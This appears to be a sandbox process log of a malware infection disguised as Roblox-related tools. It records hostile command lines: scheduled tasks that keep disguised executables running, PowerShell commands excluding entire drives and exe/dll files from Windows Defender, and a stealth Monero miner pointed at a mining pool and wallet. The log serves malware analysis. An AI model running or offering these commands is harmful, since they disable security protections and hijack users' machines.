C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES12A8.tmp" "c:\winNet\CSC35AC1482CA674AE5A4682B0E9D49A28.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yuwg5pdy\yuwg5pdy.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES13C2.tmp" "c:\DriversavessessionDlldhcp\CSC91E33477D10D4389B8D462A4608C15A1.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a1si3ueb\a1si3ueb.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES144E.tmp" "c:\Users\Admin\Music\CSCE81E5B3D68EC4E5A97015F99F63D030.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b5otnzkc\b5otnzkc.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1596.tmp" "c:\Windows\System32\CSC9923422659A044C39A5D951F6C4B4A87.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 12 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\TrustedInstaller.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tvn8rY4Wma.bat"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Bloxstrap.exe

C:\Users\Admin\Bloxstrap.exe

C:\Recovery\WindowsRE\RuntimeBroker.exe

"C:\Recovery\WindowsRE\RuntimeBroker.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\fontdrvhost.exe

C:\winNet\fontdrvhost.exe

C:\Users\Admin\Music\xdwdAdobe Illustrator.exe

"C:\Users\Admin\Music\xdwdAdobe Illustrator.exe"

C:\Users\Default\Pictures\Registry.exe

C:\Users\Default\Pictures\Registry.exe

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Recovery\WindowsRE\backgroundTaskHost.exe

C:\Recovery\WindowsRE\backgroundTaskHost.exe

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Program Files\Uninstall Information\SolaraBootstrapper.exe

"C:\Program Files\Uninstall Information\SolaraBootstrapper.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe

"C:\Program Files (x86)\Internet Explorer\ja-JP\smss.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\Users\Default\Pictures\Registry.exe.exe

"C:\Users\Default\Pictures\Registry.exe.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Users\Admin\AppData\Local\TrustedInstaller.exe

"C:\Users\Admin\AppData\Local\TrustedInstaller.exe"

C:\winNet\fontdrvhost.exe.exe

"C:\winNet\fontdrvhost.exe.exe"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

